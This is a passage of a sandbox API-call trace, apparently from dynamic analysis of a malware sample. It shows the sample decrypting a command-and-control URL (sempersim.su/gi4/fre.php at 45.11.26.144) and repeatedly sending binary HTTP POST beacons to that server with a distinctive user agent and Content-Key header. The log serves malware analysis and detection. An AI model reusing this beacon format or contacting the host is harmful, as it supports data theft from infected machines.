pdwDataLen=0xdfcfc | out: pbData=0x5d35d8, pdwDataLen=0xdfcfc) returned 1 [0186.837] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0186.838] CryptDestroyKey (hKey=0x5bde08) returned 1 [0186.838] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0186.838] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0186.839] GetProcessHeap () returned 0x5b0000 [0186.839] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d63d8 [0186.839] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0186.839] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0186.840] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0186.840] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0186.841] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0186.841] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0186.842] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0186.842] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0186.842] GetProcessHeap () returned 0x5b0000 [0186.842] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0186.842] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0186.842] GetProcessHeap () returned 0x5b0000 [0186.843] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0186.966] GetProcessHeap () returned 0x5b0000 [0186.966] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d63d8 | out: hHeap=0x5b0000) returned 1 [0186.966] GetProcessHeap () returned 0x5b0000 [0186.966] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d35d8 | out: hHeap=0x5b0000) returned 1 [0186.966] GetProcessHeap () returned 0x5b0000 [0186.966] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d30c8 [0186.967] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0186.967] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0186.973] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0186.974] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5998) returned 1 [0186.980] GetProcessHeap () returned 0x5b0000 [0186.980] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8560 [0186.981] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0186.981] CryptImportKey (in: hProv=0x5c5998, pbData=0x5c8560, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0186.982] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0186.983] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0186.984] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0186.984] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0186.984] GetProcessHeap () returned 0x5b0000 [0186.985] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8560 | out: hHeap=0x5b0000) returned 1 [0186.988] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0186.988] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d30c8, pdwDataLen=0xdfcfc | out: pbData=0x5d30c8, pdwDataLen=0xdfcfc) returned 1 [0186.989] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0186.989] CryptDestroyKey (hKey=0x5bde08) returned 1 [0186.990] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0186.990] CryptReleaseContext (hProv=0x5c5998, dwFlags=0x0) returned 1 [0186.990] GetProcessHeap () returned 0x5b0000 [0186.991] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d63d8 [0186.991] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0186.992] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0186.992] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0186.993] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0186.993] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0186.994] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0186.994] GetProcessHeap () returned 0x5b0000 [0186.994] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb1a0 [0186.994] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cde30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0186.995] GetProcessHeap () returned 0x5b0000 [0186.996] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca990 [0186.996] socket (af=2, type=1, protocol=6) returned 0x2e4 [0186.996] connect (s=0x2e4, name=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0187.066] FreeAddrInfoW (pAddrInfo=0x5cde30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0187.067] GetProcessHeap () returned 0x5b0000 [0187.067] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5cc8 [0187.067] GetProcessHeap () returned 0x5b0000 [0187.067] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0187.067] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0187.068] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0187.068] GetProcessHeap () returned 0x5b0000 [0187.068] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0187.068] GetProcessHeap () returned 0x5b0000 [0187.069] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0187.069] GetProcessHeap () returned 0x5b0000 [0187.069] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3080 [0187.069] GetProcessHeap () returned 0x5b0000 [0187.069] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0187.070] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0187.070] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0187.071] GetProcessHeap () returned 0x5b0000 [0187.071] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0187.071] GetProcessHeap () returned 0x5b0000 [0187.071] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0187.071] send (s=0x2e4, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0187.072] send (s=0x2e4, buf=0x5d1e18*, len=159, flags=0) returned 159 [0187.072] GetProcessHeap () returned 0x5b0000 [0187.072] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0187.072] recv (in: s=0x2e4, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0188.591] GetProcessHeap () returned 0x5b0000 [0188.592] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0188.592] GetProcessHeap () returned 0x5b0000 [0188.592] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3080 | out: hHeap=0x5b0000) returned 1 [0188.592] GetProcessHeap () returned 0x5b0000 [0188.592] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0188.592] GetProcessHeap () returned 0x5b0000 [0188.593] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5cc8 | out: hHeap=0x5b0000) returned 1 [0188.593] closesocket (s=0x2e4) returned 0 [0188.594] GetProcessHeap () returned 0x5b0000 [0188.594] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca990 | out: hHeap=0x5b0000) returned 1 [0188.594] GetProcessHeap () returned 0x5b0000 [0188.594] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d63d8 | out: hHeap=0x5b0000) returned 1 [0188.594] GetProcessHeap () returned 0x5b0000 [0188.594] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d30c8 | out: hHeap=0x5b0000) returned 1 [0188.594] GetProcessHeap () returned 0x5b0000 [0188.595] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb1a0 | out: hHeap=0x5b0000) returned 1 [0188.604] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xdf0) returned 0x2e4 [0188.625] Sleep (dwMilliseconds=0xea60) [0188.640] GetProcessHeap () returned 0x5b0000 [0188.640] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d31e8 [0188.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0188.641] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0188.648] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0188.649] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0188.661] GetProcessHeap () returned 0x5b0000 [0188.661] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0188.661] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0188.662] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0188.662] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0188.663] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0188.663] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0188.665] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0188.665] GetProcessHeap () returned 0x5b0000 [0188.665] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0188.666] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0188.666] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d31e8, pdwDataLen=0xdfcfc | out: pbData=0x5d31e8, pdwDataLen=0xdfcfc) returned 1 [0188.667] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0188.667] CryptDestroyKey (hKey=0x5bde08) returned 1 [0188.668] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0188.668] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0188.668] GetProcessHeap () returned 0x5b0000 [0188.668] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0188.669] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0188.669] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0188.670] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0188.670] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0188.675] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0188.675] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0188.676] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0188.677] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0188.677] GetProcessHeap () returned 0x5b0000 [0188.677] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0188.677] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0188.677] GetProcessHeap () returned 0x5b0000 [0188.678] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0188.678] GetProcessHeap () returned 0x5b0000 [0188.678] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0188.678] GetProcessHeap () returned 0x5b0000 [0188.678] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d31e8 | out: hHeap=0x5b0000) returned 1 [0188.678] GetProcessHeap () returned 0x5b0000 [0188.678] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2f60 [0188.679] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0188.680] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0188.686] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0188.686] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0188.698] GetProcessHeap () returned 0x5b0000 [0188.698] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8590 [0188.699] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0188.699] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c8590, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0188.700] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0188.700] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0188.701] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0188.701] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0188.701] GetProcessHeap () returned 0x5b0000 [0188.702] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8590 | out: hHeap=0x5b0000) returned 1 [0188.705] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0188.706] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2f60, pdwDataLen=0xdfcfc | out: pbData=0x5d2f60, pdwDataLen=0xdfcfc) returned 1 [0188.707] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0188.707] CryptDestroyKey (hKey=0x5be288) returned 1 [0188.708] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0188.708] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0188.708] GetProcessHeap () returned 0x5b0000 [0188.708] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5298 [0188.709] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0188.710] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0188.710] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0188.711] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0188.711] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0188.712] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0188.712] GetProcessHeap () returned 0x5b0000 [0188.712] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0188.712] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5ce0d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0188.719] GetProcessHeap () returned 0x5b0000 [0188.719] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca9f0 [0188.719] socket (af=2, type=1, protocol=6) returned 0x2e8 [0188.719] connect (s=0x2e8, name=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0188.800] FreeAddrInfoW (pAddrInfo=0x5ce0d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0188.800] GetProcessHeap () returned 0x5b0000 [0188.800] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5e60 [0188.800] GetProcessHeap () returned 0x5b0000 [0188.800] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0188.801] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0188.802] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0188.802] GetProcessHeap () returned 0x5b0000 [0188.802] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0188.802] GetProcessHeap () returned 0x5b0000 [0188.802] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0188.802] GetProcessHeap () returned 0x5b0000 [0188.803] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3428 [0188.803] GetProcessHeap () returned 0x5b0000 [0188.803] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0188.803] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0188.804] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0188.804] GetProcessHeap () returned 0x5b0000 [0188.804] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0188.804] GetProcessHeap () returned 0x5b0000 [0188.805] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0188.805] send (s=0x2e8, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0188.806] send (s=0x2e8, buf=0x5d1e18*, len=159, flags=0) returned 159 [0188.806] GetProcessHeap () returned 0x5b0000 [0188.806] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0188.806] recv (in: s=0x2e8, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0190.177] GetProcessHeap () returned 0x5b0000 [0190.178] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0190.178] GetProcessHeap () returned 0x5b0000 [0190.178] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3428 | out: hHeap=0x5b0000) returned 1 [0190.178] GetProcessHeap () returned 0x5b0000 [0190.178] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0190.178] GetProcessHeap () returned 0x5b0000 [0190.179] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5e60 | out: hHeap=0x5b0000) returned 1 [0190.179] closesocket (s=0x2e8) returned 0 [0190.181] GetProcessHeap () returned 0x5b0000 [0190.181] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca9f0 | out: hHeap=0x5b0000) returned 1 [0190.181] GetProcessHeap () returned 0x5b0000 [0190.182] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5298 | out: hHeap=0x5b0000) returned 1 [0190.182] GetProcessHeap () returned 0x5b0000 [0190.182] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2f60 | out: hHeap=0x5b0000) returned 1 [0190.182] GetProcessHeap () returned 0x5b0000 [0190.182] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0190.182] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x111c) returned 0x2e8 [0190.184] Sleep (dwMilliseconds=0xea60) [0190.187] GetProcessHeap () returned 0x5b0000 [0190.187] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3590 [0190.187] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0190.188] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0190.196] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0190.196] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0190.209] GetProcessHeap () returned 0x5b0000 [0190.209] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0190.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0190.210] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0190.210] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0190.211] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0190.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0190.212] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0190.212] GetProcessHeap () returned 0x5b0000 [0190.212] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0190.213] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0190.213] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3590, pdwDataLen=0xdfcfc | out: pbData=0x5d3590, pdwDataLen=0xdfcfc) returned 1 [0190.214] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0190.214] CryptDestroyKey (hKey=0x5bde08) returned 1 [0190.215] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0190.215] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0190.215] GetProcessHeap () returned 0x5b0000 [0190.216] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d4e48 [0190.216] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0190.217] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 